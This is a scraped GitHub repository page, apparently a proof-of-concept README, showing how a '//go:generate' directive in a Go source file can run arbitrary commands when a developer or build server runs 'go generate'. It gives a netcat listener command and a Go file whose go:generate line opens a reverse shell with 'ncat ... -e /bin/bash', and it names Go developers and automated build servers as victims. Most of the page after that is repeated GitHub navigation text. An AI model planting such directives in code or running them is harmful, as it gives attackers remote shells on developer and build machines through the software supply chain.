golang-RCE-0day-POC

golang RCE 0day POC

see

https://twitter.com/Hktalent3135773/status/1508635999030571008

golang/go#52059

It was officially allowed, so it was made public

https://issuetracker.google.com/issues/227263888 Maybe it's not a bug, it's the expected behavior, but it's the way of RCE（Remote Command Execution） attack in the supply chain The go generate command does not conduct security check. When compiling the associated malicious library and code, it may cause the execution of the "//go:generate [malicious command]"

Impact

1、hacker run

nc -lv 4444

2、POC

testRce.go
Code 152 BytesWrap lines Copy Download
package main

import (
       "fmt"
)
//go:generate ncat 127.0.0.1 4444 -e /bin/bash
func main() {
fmt.Println("test go:generate remote command execution ")
}

3、run build

go generate -x testRce.go

4、test command execution

in "nc -lv 4444" console

Attack scenario: People who provide golang open source libraries and projects may embed malicious commands, causing users to trigger commands during compilatio

受害者

Golang developer
Golang open source automatic compilation integration server

Name		Name	Last commit message	Last commit date
Latest commit History 6 Commits
.gitignore		.gitignore
LICENSE		LICENSE
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

golang-RCE-0day-POC

see

It was officially allowed, so it was made public

Impact

1、hacker run

2、POC

3、run build

4、test command execution

受害者

About

Releases

Packages

License

hktalent/golang-RCE-0day-POC

Folders and files

Latest commit

History

Repository files navigation

golang-RCE-0day-POC

see

It was officially allowed, so it was made public

Impact

1、hacker run

2、POC

3、run build

4、test command execution

受害者

About

Resources

License

Stars

Watchers

Forks

Releases

Packages 0

Packages